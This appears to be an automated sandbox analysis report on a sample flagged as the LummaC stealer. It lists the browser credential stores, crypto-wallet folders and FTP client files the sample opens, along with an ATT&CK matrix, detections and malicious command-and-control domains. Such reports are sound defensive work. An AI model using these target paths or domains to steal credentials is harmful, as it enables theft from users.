          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6764, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6764, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          Process Injection          		34
          Virtualization/Sandbox Evasion          		2
          OS Credential Dumping          		751
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Process Injection          		LSASS Memory34
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol41
          Data from Local System          		2
          Non-Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          PowerShell          		Logon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive113
          Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
          Obfuscated Files or Information          		NTDS1
          File and Directory Discovery          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
          Software Packing          		LSA Secrets223
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe39%ReversingLabsWin32.Trojan.Generic
          file.exe100%AviraTR/Crypt.TPM.Gen
          file.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%URL Reputationsafe
          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%URL Reputationsafe
          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
          http://x1.c.lencr.org/00%URL Reputationsafe
          http://x1.i.lencr.org/00%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
          https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          necklacedmny.store
          		188.114.96.3
          		truetrue
            		unknown
            presticitpo.store
            		unknown
            		unknowntrue
              		unknown
              thumbystriw.store
              		unknown
              		unknowntrue
                		unknown
                crisiwarny.store
                		unknown
                		unknowntrue
                  		unknown
                  fadehairucw.store
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://necklacedmny.store/apitrue
                      		unknown
                      presticitpo.storetrue
                        		unknown
                        scriptyprefej.storetrue
                          		unknown
                          necklacedmny.storetrue
                            		unknown
                            fadehairucw.storetrue
                              		unknown
                              navygenerayk.storetrue
                                		unknown
                                founpiuer.storetrue
                                  		unknown
                                  thumbystriw.storetrue
                                    		unknown
                                    crisiwarny.storetrue
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.amazon.cfile.exe, file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125885120.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126281997.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://necklacedmny.store/apiCfile.exe, 00000000.00000002.2173989776.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172326210.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172028798.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://necklacedmny.store/api?file.exe, 00000000.00000003.2169316679.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176031548.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://necklacedmny.store/#file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125885120.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126281997.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://necklacedmny.store/cfile.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctafile.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2110462706.0000000005B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgfile.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://necklacedmny.store/file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://x1.c.lencr.org/0file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://x1.i.lencr.org/0file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&reffile.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
